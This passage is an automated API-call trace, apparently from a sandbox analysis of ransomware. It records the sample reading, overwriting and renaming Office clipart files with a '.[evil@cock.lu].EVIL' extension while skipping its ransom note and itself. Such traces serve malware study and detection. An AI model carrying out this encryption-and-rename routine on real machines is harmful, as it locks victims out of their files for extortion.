hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.046] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa80, lpOverlapped=0x0) returned 1 [0171.046] CloseHandle (hObject=0x1a8) returned 1 [0171.046] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.046] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.046] __uncaught_exception () returned 0x84b1160800 [0171.046] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.046] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf.[evil@cock.lu].evil")) returned 1 [0171.047] ??_V@YAXPEAX@Z () returned 0x1 [0171.050] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF", dwFileAttributes=0x200) returned 0 [0171.050] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.050] wcsstr (_Str="SO02276_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.050] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF") returned 69 [0171.050] wcscmp (_String1="SO02276_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02276_.WMF") returned 0x0 [0171.050] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF") returned 0x45 [0171.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.052] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30e4, lpOverlapped=0x0) returned 1 [0171.106] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.106] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.106] _errno () returned 0x84b1160840 [0171.106] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.106] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0171.106] CloseHandle (hObject=0x1a8) returned 1 [0171.107] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.107] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.107] __uncaught_exception () returned 0x84b1160800 [0171.107] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.107] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf.[evil@cock.lu].evil")) returned 1 [0171.108] ??_V@YAXPEAX@Z () returned 0x1 [0171.111] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF", dwFileAttributes=0x200) returned 0 [0171.111] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.111] wcsstr (_Str="SO02413_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.111] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF") returned 69 [0171.111] wcscmp (_String1="SO02413_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.111] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02413_.WMF") returned 0x0 [0171.111] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF") returned 0x45 [0171.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.113] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17a1c, lpOverlapped=0x0) returned 1 [0171.134] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.134] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.134] _errno () returned 0x84b1160840 [0171.134] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.134] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x17a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17a20, lpOverlapped=0x0) returned 1 [0171.134] CloseHandle (hObject=0x1a8) returned 1 [0171.134] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.134] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.135] __uncaught_exception () returned 0x84b1160800 [0171.135] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.135] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf.[evil@cock.lu].evil")) returned 1 [0171.136] ??_V@YAXPEAX@Z () returned 0x1 [0171.138] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF", dwFileAttributes=0x200) returned 0 [0171.138] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.138] wcsstr (_Str="SO02431_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.138] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF") returned 69 [0171.138] wcscmp (_String1="SO02431_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02431_.WMF") returned 0x0 [0171.139] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF") returned 0x45 [0171.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.141] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x670, lpOverlapped=0x0) returned 1 [0171.155] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.155] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.155] _errno () returned 0x84b1160840 [0171.156] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.156] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x680, lpOverlapped=0x0) returned 1 [0171.156] CloseHandle (hObject=0x1a8) returned 1 [0171.156] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.156] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.156] __uncaught_exception () returned 0x84b1160800 [0171.156] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.156] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf.[evil@cock.lu].evil")) returned 1 [0171.157] ??_V@YAXPEAX@Z () returned 0x1 [0171.160] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF", dwFileAttributes=0x200) returned 0 [0171.160] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.160] wcsstr (_Str="SO02437_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.160] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF") returned 69 [0171.160] wcscmp (_String1="SO02437_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.160] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02437_.WMF") returned 0x0 [0171.160] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF") returned 0x45 [0171.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.162] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b4, lpOverlapped=0x0) returned 1 [0171.169] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.169] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.169] _errno () returned 0x84b1160840 [0171.170] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.170] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0171.170] CloseHandle (hObject=0x1a8) returned 1 [0171.170] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.170] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.170] __uncaught_exception () returned 0x84b1160800 [0171.170] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.170] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf.[evil@cock.lu].evil")) returned 1 [0171.171] ??_V@YAXPEAX@Z () returned 0x1 [0171.174] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF", dwFileAttributes=0x200) returned 0 [0171.174] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.174] wcsstr (_Str="SO02439_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.174] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF") returned 69 [0171.174] wcscmp (_String1="SO02439_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.174] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02439_.WMF") returned 0x0 [0171.174] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF") returned 0x45 [0171.174] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.176] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x504, lpOverlapped=0x0) returned 1 [0171.184] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.184] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.184] _errno () returned 0x84b1160840 [0171.184] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.184] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x520, lpOverlapped=0x0) returned 1 [0171.184] CloseHandle (hObject=0x1a8) returned 1 [0171.184] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.185] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.185] __uncaught_exception () returned 0x84b1160800 [0171.185] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.185] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf.[evil@cock.lu].evil")) returned 1 [0171.186] ??_V@YAXPEAX@Z () returned 0x1 [0171.188] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF", dwFileAttributes=0x200) returned 0 [0171.189] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.189] wcsstr (_Str="SO02464_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.189] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF") returned 69 [0171.189] wcscmp (_String1="SO02464_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.189] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02464_.WMF") returned 0x0 [0171.189] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF") returned 0x45 [0171.189] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.191] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a54, lpOverlapped=0x0) returned 1 [0171.197] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.197] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.197] _errno () returned 0x84b1160840 [0171.197] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.198] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a60, lpOverlapped=0x0) returned 1 [0171.198] CloseHandle (hObject=0x1a8) returned 1 [0171.198] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.198] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.198] __uncaught_exception () returned 0x84b1160800 [0171.198] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.198] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf.[evil@cock.lu].evil")) returned 1 [0171.199] ??_V@YAXPEAX@Z () returned 0x1 [0171.202] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF", dwFileAttributes=0x200) returned 0 [0171.202] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.202] wcsstr (_Str="SO02465_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.202] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF") returned 69 [0171.202] wcscmp (_String1="SO02465_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.202] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02465_.WMF") returned 0x0 [0171.202] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF") returned 0x45 [0171.202] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.204] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x574, lpOverlapped=0x0) returned 1 [0171.211] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.211] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.211] _errno () returned 0x84b1160840 [0171.211] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.211] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x580, lpOverlapped=0x0) returned 1 [0171.211] CloseHandle (hObject=0x1a8) returned 1 [0171.211] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.212] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.212] __uncaught_exception () returned 0x84b1160800 [0171.212] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.212] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf.[evil@cock.lu].evil")) returned 1 [0171.213] ??_V@YAXPEAX@Z () returned 0x1 [0171.216] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF", dwFileAttributes=0x200) returned 0 [0171.216] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.216] wcsstr (_Str="SO02578_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.216] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF") returned 69 [0171.216] wcscmp (_String1="SO02578_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.216] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02578_.WMF") returned 0x0 [0171.216] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF") returned 0x45 [0171.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.218] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19ca, lpOverlapped=0x0) returned 1 [0171.226] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.226] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.226] _errno () returned 0x84b1160840 [0171.226] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.226] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19e0, lpOverlapped=0x0) returned 1 [0171.226] CloseHandle (hObject=0x1a8) returned 